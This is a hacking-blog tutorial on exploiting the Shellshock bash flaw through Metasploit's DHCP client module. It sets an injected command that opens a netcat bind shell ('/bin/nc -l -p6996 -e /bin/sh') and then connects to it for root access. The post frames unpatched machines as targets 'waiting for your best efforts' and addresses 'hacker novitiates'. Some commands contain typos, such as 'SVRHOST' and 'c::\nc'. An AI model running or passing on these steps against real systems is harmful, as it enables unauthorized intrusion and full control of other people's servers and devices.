How to Hack Any WebServer Like a Pro with Shellshock Vulnerability
Greeting Hackers,
Now days or I Say every day, a MAJOR vulnerability appears that makes millions of systems vulnerable to attack. The most recent, named Shellshock, basically leaves every Mac OS X, Linux, and UNIX system on the planet vulnerable to hackers. As nearly two-thirds of all web servers on internet run on one of these operating systems (primarily Linux), that's a whole lot of systems out there waiting to be harvested.
This vulnerability is one of the most serious in recent memory. Basically, it leaves nearly every form of Linux, Unix, and Mac OS X vulnerable to "remote code execution." This mean that the hacker can run their own code remotely and do whatever they want on the system, basically owning it.
Shellshock will be with us for quite a while, despite efforts to patch systems, as we are only beginning to understand the extent of this vulnerability. Every time a new patch is released, it almost immediately becomes obsolete as new vulnerabilities are being discovered daily. The first proof of concept involved running a CGI script on the vulnerable system, but that is only scratching the surface of what can be done with this vulnerability.
Many network and security admins are now sitting around pretty smug that they have patched their system and they are now safe. That is far from the truth! This vulnerability is linked to the BASH shell and any system calls it makes. That list is extremely long! Probably thousands of utilities and applications use BASH for system calls. Furthermore, nearly all the embedded systems, from security systems to automobiles to automated lighting systems use some form of Linux with a BASH shell. ALL are vulnerable to this hack.
Of course, the whole industry of IT security administrators are now scrambling to close this hole. Years of experience have taught me that many won't and many more will think they closed it and haven't (there is a fair amount of incompetence among IT security folks, as in other professions). In the meantime, millions are millions of machines are out there, just waiting for your best efforts.
Recently, our friends at Rapid7, the developers of Metasploit, released a quick and dirty module that exploits one of the first discovered Shellshock vulnerabilities, namely the exploitation of the BASH shell to send CGI scripts to an Apache server. In addition, they also developed a module that enables us to exploit Shellshock using the DHCP service. Let's use that one to attack a Linux system and see how it works.
Step 1: Start Metasploit
Let's begin, of course, by firing up Kali Linux and starting Metasploit. You should be greeted by a screen similar to the following one. |
How to Hack Any WebServer Like a Pro with Shellshock Vulnerability |
Step 2: Update Metasploit
Since this is a new Meatsploit module, it is not in your Metasploit Framework when you downloaded Kali, so we need to update Metasploit. Let's open a terminal and type:kali > msfupdate
 |
How to Hack Any WebServer Like a Pro with Shellshock Vulnerability |
This might take awhile, so be patient.
Step 3: Find the Exploit
Now that we updated our Metasploit and presumably downloaded the new Shellshock modules, let's find this new exploit. In the Metasploit framework, type:msf > search shellshock
 |
How to Hack Any WebServer Like a Pro with Shellshock Vulnerability |
As we can see, Metasploit found the auxiliary module for attacking the DHCP client using the Shellshock vulnerability.
Let's now load that module by typing:
msf > use auxiliary/server/dhclient/dhclient_bash_env
Now, let's type info to get more information on this module.
msf > info
 |
How to Hack Any WebServer Like a Pro with Shellshock Vulnerability |
We can see in the screenshot above each of the various options for this module and some basic information about it. The key parameters are CMD, SRVHOST, and NETMASK.
Step 4: Set Up the Module Parameters
Now, let's show options.msf > show options
msf > set SVRHOST 192.168.131.254
msf > set CMD /bin/nc -l -p6996 -e /bin/sh
msf > set NETMASK 255.255.255.0
msf > exploit
Step 5: Connect to the Exploited System
Now that we have injected netcat into the vulnerable system, we should be able to connect to that machine remotely with administrative/root privileges. We would then own that machine!For demonstration purposes, let's connect to that system with a Windows machine remotely by connecting to the netcat listener. First, open a command prompt on the Windows system and type:
c::\nc 192.168.131.129 6996
When we do so, it will return a blank line. When we type "ifconfig":
ifconfig
whoami
The Shellshock vulnerability makes nearly every system that runs a version of UNIX, Linux, or Mac OS X vulnerable to exploitation. Since the vulnerability is related to the BASH shell and its system calls, the number of vulnerabilities and exploits will become nearly innumerable.
This hack utilizes the BASH system call to the DHCP client, but this is just one of many potential exploits. Apple and the major Linux distributions have all issued patches, but there are still innumerable ways to get past these patches. I expect them to be issuing new patches almost weekly as we find more and more exploits taking advantage of the Shellshock vulnerability.
I will keep you up to date on each of these new hacks, so keep coming back, my hacker novitiates!
Post Credits:null-byte.wonderhowto.com
Post a Comment